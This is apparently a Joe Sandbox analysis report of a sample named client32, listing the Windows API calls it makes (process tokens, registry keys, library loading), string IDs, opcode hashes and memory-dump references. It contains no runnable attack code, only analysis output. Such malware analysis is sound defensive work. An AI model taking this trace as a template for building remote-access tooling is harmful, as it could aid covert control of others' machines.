                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                                                                                    • API String ID: 4180936305-2664294811
                                                                                                                                                                                                    • Opcode ID: 8c46f8bdfcf2cceb23277aedb1d4bd90d56bb8b7b475ab6a7bb023f0edc9b731
                                                                                                                                                                                                    • Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c46f8bdfcf2cceb23277aedb1d4bd90d56bb8b7b475ab6a7bb023f0edc9b731
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                                                                                      • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,75C1F550,?,00000000), ref: 1109DC58
                                                                                                                                                                                                      • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                                                                                      • Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                                                                                      • Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,005FF708,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2256153495-0
                                                                                                                                                                                                    • Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: af0741c83ff0c3ea02da9e4e70e0ae876956b4f6ade4dddd8bd1eda65f1bfe07
                                                                                                                                                                                                    • Instruction ID: 924decae14a629f733ede0bb622a477ce8d6e199e6b7b916e29b3dd74e49d163
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af0741c83ff0c3ea02da9e4e70e0ae876956b4f6ade4dddd8bd1eda65f1bfe07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1811573E404317AFCBD22FB09944A6DFB9A9B423F8B214425F9298A140EF71D840CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3991485460-0
                                                                                                                                                                                                    • Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: ??CTL32.DLL
                                                                                                                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                                                                                                                    • Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                                                                                    • Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110267DD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DriveType
                                                                                                                                                                                                    • String ID: ?:\
                                                                                                                                                                                                    • API String ID: 338552980-2533537817
                                                                                                                                                                                                    • Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                                                                                    • Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAE9D
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAEEC
                                                                                                                                                                                                      • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %d Opening regkey %s, xrefs: 110EAEFA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpenwvsprintf
                                                                                                                                                                                                    • String ID: Error %d Opening regkey %s
                                                                                                                                                                                                    • API String ID: 1772833024-3994271378
                                                                                                                                                                                                    • Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                                                                                    • Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAE9D
                                                                                                                                                                                                      • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %d closing regkey %x, xrefs: 110EAEAD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Closewvsprintf
                                                                                                                                                                                                    • String ID: Error %d closing regkey %x
                                                                                                                                                                                                    • API String ID: 843752472-892920262
                                                                                                                                                                                                    • Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                                                                                    • Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,023AB828,?,?,?,00000100), ref: 111429F9
                                                                                                                                                                                                      • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                    • String ID: NSMTRACE
                                                                                                                                                                                                    • API String ID: 4133054770-4175627554
                                                                                                                                                                                                    • Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,689B8DC8), ref: 689B4F78
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
